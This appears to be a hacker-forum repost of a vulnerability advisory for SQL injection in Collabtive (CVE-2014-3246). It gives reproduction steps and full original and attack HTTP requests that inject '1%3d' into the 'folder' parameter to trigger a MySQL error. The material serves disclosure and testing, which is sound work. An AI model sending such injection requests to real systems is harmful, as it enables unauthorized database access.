跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Collabtive 1.2 - SQL Injection

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
Vulnerability title: SQL Injection / SQL Error message in Collabtive
application (CVE-2014-3246)
CVE: CVE-2014-3246 (cordinated with
Vendor: Collabtive
Product: Collabtive (Open Source Project Management Software)
Affected version: 1.12
Fixed version: 2.0
Reported by: Deepak Rathore
Severity: Critical
URL: http://[domain]/collabtive-12/managefile.php?action=showproject&id=2482
Affected Users: Authenticated users
Affected parameter(s): folder

Issue details: The folder parameter appears to be vulnerable to SQL
injection attacks. The payload 1%3d was submitted in the folder parameter,
and a database error message was returned. You should review the contents
of the error message, and the application's handling of other input, to
confirm whether a vulnerability is present.  The database appears to be
MySQL.

HTTP request:
GET /manageajax.php?action=fileview_list&id=2482&folder=1%3d HTTP/1.1
Host: collabtive.o-dyn.de
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101
Firefox/29.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.0.3
Referer:
http://xxx/managefile.php?action=showproject&id=2482
Cookie: PHPSESSID=ba83d29aab270a7926ea1be2e1f830be;
PHPSESSID=ba83d29aab270a7926ea1be2e1f830be
Connection: keep-alive

Steps to replicate:
1. Login into application
2. Go to "Desktop" tab and click on "Add project"
3. Fill the project details in the project form and click on "Add" button
4. After creating a project go to "Files" tab and Intercept the request
5. At "manageajax.php" file, replace "folder" parameter value with "1%3d"
=====================
Original Request
=====================
GET /manageajax.php?action=fileview_list&id=2482&folder=0 HTTP/1.1
Host: collabtive.o-dyn.de
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101
Firefox/29.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.0.3
Referer:
http://xxx/managefile.php?action=showproject&id=2482
Cookie: PHPSESSID=ba83d29aab270a7926ea1be2e1f830be;
PHPSESSID=ba83d29aab270a7926ea1be2e1f830be
Connection: keep-alive
======================
Attack Request
======================
GET /manageajax.php?action=fileview_list&id=2482&folder=1%3d HTTP/1.1
Host: collabtive.o-dyn.de
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101
Firefox/29.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.0.3
Referer:
http://xxx/managefile.php?action=showproject&id=2482
Cookie: PHPSESSID=ba83d29aab270a7926ea1be2e1f830be;
PHPSESSID=ba83d29aab270a7926ea1be2e1f830be
Connection: keep-alive
======================
6. Forward manipulated request to server and wait for response in browser
7. SQL Error message is the proof of vulnerability.

Tools used: Burp Suite proxy, Mozilla Firefox browser

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。